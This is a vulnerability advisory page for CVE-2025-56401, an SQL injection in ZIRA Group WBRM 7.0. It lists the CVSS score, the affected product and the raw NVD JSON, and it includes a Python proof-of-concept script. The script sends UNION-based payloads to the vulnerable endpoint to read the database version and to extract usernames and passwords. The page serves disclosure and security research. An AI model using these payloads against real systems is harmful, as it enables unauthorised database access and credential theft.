Security Vulnerability Report
中文
CVE-2025-56401 CVSS 7.6 HIGH

CVE-2025-56401

Published: 2025-11-24 16:15:49
Last Modified: 2025-12-30 18:15:28

Description

ZIRA Group WBRM 7.0 is vulnerable to SQL Injection in referenceLookupsByTableNameAndColumnName.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ziragroup:wbrm:7.0:*:*:*:*:*:*:* - VULNERABLE
ZIRA Group WBRM 7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56401 SQL Injection PoC # Target: ZIRA Group WBRM 7.0 # Vulnerability: SQL Injection in referenceLookupsByTableNameAndColumnName import requests import json target_url = "http://target-server/wbrm/api/referenceLookupsByTableNameAndColumnName" # Basic authentication with low-privilege account auth = ('low_privilege_user', 'password') # SQL Injection payload - extract database version payload_table = "users' UNION SELECT NULL,version()--" payload_column = "id" params = { 'tableName': payload_table, 'columnName': payload_column } try: response = requests.get( target_url, params=params, auth=auth, timeout=10 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # If successful, the response may contain database version info if response.status_code == 200: print("\n[!] Possible SQL Injection - Check response for database info") except requests.exceptions.RequestException as e: print(f"Error: {e}") # Extract user credentials payload payload_extract = "users' UNION SELECT NULL,username||':'||password FROM users--" params_extract = { 'tableName': payload_extract, 'columnName': payload_column } try: response = requests.get( target_url, params=params_extract, auth=auth, timeout=10 ) print(f"\nExtraction Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Extraction Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56401", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:49.473", "lastModified": "2025-12-30T18:15:27.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZIRA Group WBRM 7.0 is vulnerable to SQL Injection in referenceLookupsByTableNameAndColumnName."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ziragroup:wbrm:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "A110138A-CB64-46B2-AA81-D9B784C82902"}]}]}], "references": [{"url": "http://wbrm.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://mstreet97.github.io/security/cve/sqli/2025/07/25/Zira-WBRM-SQL-Injection-CVE-2025-56401.html", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}